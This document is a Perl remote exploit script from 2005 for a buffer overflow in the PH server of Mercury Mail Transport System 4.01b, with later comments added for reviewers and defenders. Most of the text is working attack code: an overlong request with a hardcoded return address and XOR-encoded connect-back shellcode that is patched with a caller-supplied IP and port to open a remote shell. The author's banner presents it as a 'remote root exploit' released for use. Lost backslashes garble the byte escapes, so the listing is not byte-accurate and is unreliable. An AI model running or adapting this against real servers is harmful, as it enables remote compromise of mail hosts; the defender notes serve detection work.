# Title : Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)
# Published : 2005-12-16
# Author : kcope
### mercurysexywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
###################################################################
use IO::Socket;
# 316 bytes
# Binary payload, assembled from string fragments into $cbsc.
# Code further down overwrites 4 bytes at offset 111 and 2 bytes at
# offset 118 of this string with the caller-supplied address and port,
# XORing each byte with 0xc2 first. This is therefore presumably a
# connect-back payload stored XOR-encoded with key 0xc2 (the bytes are
# not disassembled here - confirm before relying on this).
# NOTE(review): the "x.." runs look like hex byte escapes whose
# backslashes were lost when the page was extracted, so the listing is
# not a byte-accurate copy. When comparing against packet captures, use
# the hex values as the reference, not the text as printed.
# Defender note: two bytes ranges of the payload vary per run and the
# body appears to be encoded, so a fixed byte-string signature on the
# payload is brittle. Matching on the request shape and on the server's
# resulting outbound connection is more robust.
$cbsc =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0BxC2xE2xFA"
."xEBx05xE8xEBxFFxFFxFF"
."x2Bx39xC2xC2xC2x9DxA6x63xF2xC2xC2xC2x49x82xCEx49"
."xB2xDEx6Fx49xAAxCAx49x35xA8xC6x9Bx2Ax59xC2xC2xC2"
."x20x3BxAAxF1xF0xC2xC2xAAxB5xB1xF0x9Dx96x3DxD4x49"
."x2AxA8xC6x9Bx2Ax40xC2xC2xC2x20x3Bx43x2Ex52xC3xC2"
."xC2x96xAAxC3xC3xC2xC2x3Dx94xD2x92x92x92x92x82x92"
."x82x92x3Dx94xD6x49x1AxAAxBDxC2xC2xC3xAAxC0xC2xC2"
."xF7x49x0ExA8xD2x93x91x3Dx94xDAx47x02xB7x88xAAxA1"
."xAFxA6xC2x4BxA4xF2x41x2Ex96x4FxFExE6xA8xD7x9Bx69"
."x20x3Fx04x86xE6xD2x86x3Cx86xE6xFFx4Bx9ExE6x8Ax4B"
."x9ExE6x8Ex4Bx9ExE6x92x4Fx86xE6xD2x96x92x93x93x93"
."xA8xC3x93x93x3DxB4xF2x93x3Dx94xC6x49x0ExA8x3Dx3D"
."xF3x3Dx94xCAx91x3Dx94xDEx3Dx94xCEx93x94x49x87xFE"
."x49x96xEAxBAxC1x17x90x49xB0xE2xC1x37xF1x0Bx8Bx83"
."x6FxC1x07xF1x19xCDx7CxD2xF8x14xB6xCAx03x09xCFxC1"
."x18x82x29x33xF9xDDxB7x25x98x49x98xE6xC1x1FxA4x49"
."xCEx89x49x98xDExC1x1Fx49xC6x49xC1x07x69x9Cx9Bx01"
."x2AxC2x3Dx3Dx3Dx4Cx8CxCCx2ExB0x3Cx71xD4x6Fx1BxC7"
."x0CxBCx1Ax20xB1x09x2Fx3ExF9x1BxCBx37x6Fx2Ex3Bx68"
."xA2x25xBBx04xBB";
# Target table. Each entry is [description, 4-byte value]; the second
# element is read later as $ret and placed in the request between the
# two filler regions. $numtargets is only used to bound the usage loop.
# The single entry is tied to one product build and two Windows service
# pack levels, i.e. the value is build-specific rather than generic.
# Defender note: per this page the affected build is Mercury Mail
# Transport System 4.01b. Inventory hosts running that build with the
# PH server module enabled and prioritise them for upgrade or for
# disabling the module.
$numtargets = 1;
@targets =
(
["Mercury Mail Transport System 4.01b Win2k SP4/WinXP SP2", "x83xf2x41x00"]
);
# Prints the author's banner unconditionally.
print "Okayokay THiS iS 0DAY!!!n";
print "Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOITnkcope [kingcope(at)gmx.net] in 2005! JUUAREZ!n";
print "Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!n";
# Requires exactly four command-line arguments ($#ARGV is the last
# index, so 3 means four arguments). Otherwise prints the usage line and
# the numbered target list, then exits with status 0.
if ($#ARGV ne 3) {
print "usage: mecurysexywarez.pl target targettype yourip yourportnn";
for ($i=0; $i<$numtargets; $i++) {
print " [".$i."]...". $targets[$i][0]. "n";
}
exit(0);
}
# Opens a TCP connection to the host given as the first argument, on
# port 105. The page title names the PH server of Mercury Mail Transport
# System 4.01b as the affected service. Dies if the connection fails.
# Defender note: if the PH service is not needed, disable it or filter
# TCP/105 at the network boundary. Exposure of this port is the
# precondition for everything below.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '105',
Proto => 'tcp') || die("Oh my godess! Port not open! Pleeze open and try again :PP");
# Remaining arguments: index into @targets, then the address and port
# that are written into the payload.
$tt=$ARGV[1];
$cbip=$ARGV[2];
$cbport=$ARGV[3];
# The result of gethostbyname() is split into single characters and the
# first four are taken as the address bytes. Each is XORed with 0xc2 and
# the four results replace bytes 111..114 of $cbsc.
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0xc2);
$a2 = chr(ord($a2) ^ 0xc2);
$a3 = chr(ord($a3) ^ 0xc2);
$a4 = chr(ord($a4) ^ 0xc2);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);
# The port is packed as a 16-bit value, byte-reversed, XORed with 0xc2
# per byte, and written over bytes 118..119 of $cbsc.
($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0xc2);
$p2 = chr(ord($p2) ^ 0xc2);
substr($cbsc, 118, 2, $p1 . $p2);
# Request layout, in order: 408 filler bytes ("A"), the payload, 4 fixed
# bytes, the 4-byte target value from @targets, a fixed letter sequence
# followed by 5 fixed bytes, then 440 more filler bytes.
# Defender note: going by the lengths in this listing, the result is one
# request line of more than a kilobyte, made mostly of a repeated byte
# and non-printable data. That is far outside a normal PH query, so a
# length or character-class check on TCP/105 traffic is a usable
# detection. An outbound TCP connection initiated by the mail server
# process shortly afterwards is the behavioural indicator. Egress
# filtering on the server limits the impact.
$pad="A" x 408 . $cbsc . "x90x90xebx04";
$pad2="A" x 440;
$ret=$targets[$tt][1];
$x=$pad.$ret."JJJJKKKKLLLLMMMMNNNNOOOOPPPPxe9x87xfexffxff".$pad2;
# Sends the request as a single line, then echoes whatever the server
# returns until the connection closes.
print $sock "$xrn";
while (<$sock>) {
print;
}